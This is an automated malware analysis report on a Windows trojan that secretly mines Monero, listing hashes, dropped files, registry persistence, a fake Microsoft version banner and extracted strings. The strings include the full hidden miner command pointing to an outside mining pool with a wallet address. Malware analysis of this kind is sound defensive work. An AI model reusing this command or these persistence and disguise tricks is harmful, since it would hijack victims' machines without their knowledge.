Gen.Variant.Zusy.186786_7a14d10ebc
Trojan.Win32.BitMiner.jz (Kaspersky), Gen:Variant.Zusy.186786 (B) (Emsisoft), Gen:Variant.Zusy.186786 (AdAware), Trojan.Win32.FlyStudio.FD, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 7a14d10ebc50ad01af46c1e3a2bbf8ba
SHA1: 285cdd6ad931a6a1e4a1ed73e5b792f69de5e0d0
SHA256: 739c1699ffb84f71aa58530265b59cc329fd202352c5fb3a1be456e48f096cbf
SSDeep: 98304:UDoMNXOxHjiHmU7AxwWajvOoykazOIz70i:oeBE7Eaj0k8f
Size: 3788800 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company:
Created at: 2016-03-29 07:32:31
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1004
srvany.exe:1664
The Trojan injects its code into the following process(es):
Systmsi.exe:896
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1004 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Systmsi.exe (7972 bytes)
%System%\srvany.exe (8 bytes)
Registry activity
The process %original file name%.exe:1004 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 3B 34 6B E6 75 C5 B1 4C 3F A0 24 76 0B BD D8"
[HKLM\System\CurrentControlSet\Services\Mmservesi\Parameters]
"AppDirectory" = "c:\windows\"
"Application" = "c:\windows\svchosi.exe"
The process srvany.exe:1664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC 95 5E DE 10 C3 6E 6C F7 A7 7D E3 D1 3B BD D6"
The process Systmsi.exe:896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 8D B4 24 E9 7F 10 35 DC 3D 57 58 F2 4D D4 2F"
Dropped PE files
| MD5 | File path |
|---|---|
| 8b11325f4b729b7072c050035b454759 | c:\WINDOWS\Systmsi.exe |
| 4635935fc972c582632bf45c26bfcb0e | c:\WINDOWS\system32\srvany.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.1.7600.16385
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: HelpPane.exe
Internal Name: HelpPane.exe
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
File Description: Microsoft Help and Support
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 543626 | 544768 | 4.55417 | b5c4cd2bff5ed212ce658de7d0071d05 |
| .rdata | 548864 | 3115030 | 3117056 | 5.49669 | 789993537fad7280715ed772652d8148 |
| .data | 3665920 | 162376 | 73728 | 3.50315 | f2f3e9db0b1210ac4c24fcc24f3a2953 |
| .rsrc | 3829760 | 49152 | 49152 | 3.81209 | a23c9ce9f88d0a269bccf6dfc2bc687c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
advapi32.dll
Advapi32.dll
Kernel32.dll
kernel32.dll
ADVAPI32.DLL
RegOpenKeyExA
RegCreateKeyExA
RegCloseKey
GetServiceKeyNameA
Systmsi.exe
Systmsi.exe -a cryptonight -o stratum tcp://xmr.crypto-pool.fr:3333 -u 43YkRcrdW8zDsMNhP29S1yF8QBqYJ5UGgPCgCXUKyHnFFD8proXWxywYgMLvxBpVb4TSN3fD9taDrbJYnPbXAg6K5kNpLiN -p x -t 0 -dbg -1
Systmssi.exe
Systmssi.exe -a cryptonight -o stratum tcp://xmr.crypto-pool.fr:3333 -u 43YkRcrdW8zDsMNhP29S1yF8QBqYJ5UGgPCgCXUKyHnFFD8proXWxywYgMLvxBpVb4TSN3fD9taDrbJYnPbXAg6K5kNpLiN -p x -t 0 -dbg -1
.pdata
@.tls
.vmp0
.vmp1
.reloc
@.rsrc
Ap.JPQ
.RDpd
bl.yr%$k
|z%CM
Delk.Zj
vL]%f
t%6Uj)
aWX.oF
T.Lb`gdi
n.bR1
.Kfr:
)%cl-
.ziPgw
Nj.mK
.lrY(
[I%uK
"i%fW
xr.RL
k[.na
.Us=31
udPB
%DyIT
D5.pi
.jiE-
.kMrZ*6~
]T>0}%F
.TEgD
h.qus0
-!.SU
-`.cN@
hJ.dFW
.jMvo
.hY(f
oj.NXg
o%S '
z:%cIC
;y..Zi"K
WP{m.topE.kcT[
dy).pg
C.Apg
i%Do.
I%d)m
mg.un4`
Kn.IV
$l:%X
I%u=i
MTa.zi
.zif`
yn,J%C
%xKn1(c
gx`%c
m.XhY
5tX&%c
.dNnY
v.hmf
eB.jX
R.ta!]W
.hp%*
kwo.gD
wq-Z}
.hCxip
hfTp
.WHj&
FL.Zn
X.zh:^
(.%cR
G.qMK
,.zXfU
%XV<oA
Rv.cOQKM
vpþ
SkIt%C
/K%xB#S
|8`8%d
KERNEL32.dll
Zic%f
/.BBE
Z8A.Vy@H
H.HOB
WS2_32.dll
EnumChildWindows
lW.my
,5".01 8
9:T.Yu
.IH92
^Duser32.dll
USER32.dll
.lWU*)/
ecb_Ã
]Fd.TC$@
%d`#25
.%SJ'6x
4E%D:
.eDRk
X8%D@B$ $
z%Xz
D .Bj
^_t%u#
10\.ga7
Mb9_9.ap
t{%d?h #..kS1
).saHc
1.AFu
'nl%f
`X.bf
~'_%c
C^.ar
(ýn
~%C>I
c.Zi~
RO}.gB"05
T~(%f
I~.VC
#.Im%"a
yd.KI
sb$i.Tik]
WXR.Jc
n`%UI
%dXqE
G.Rtr
.Zbh|
>?%Xf
, *10/.5
9.eRY
.qx )
'?yADVAPI32.dll
E:\CryptoNight\bitmonero-master\src\miner\x64\CPU-Release\Crypto.pdb
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
d`.OE
dlo%S
11D1
434~4&585
3 3$3(3,30343
7|7r7
7|7R7a7
9 9$9(9,90949~9
<"=1=9=?=
4 4$4(4,4044484<4@4
< <$<(<,<0<4<8<
1 1$1(1,1014181<1
; ;$;(;,;
8(8,80848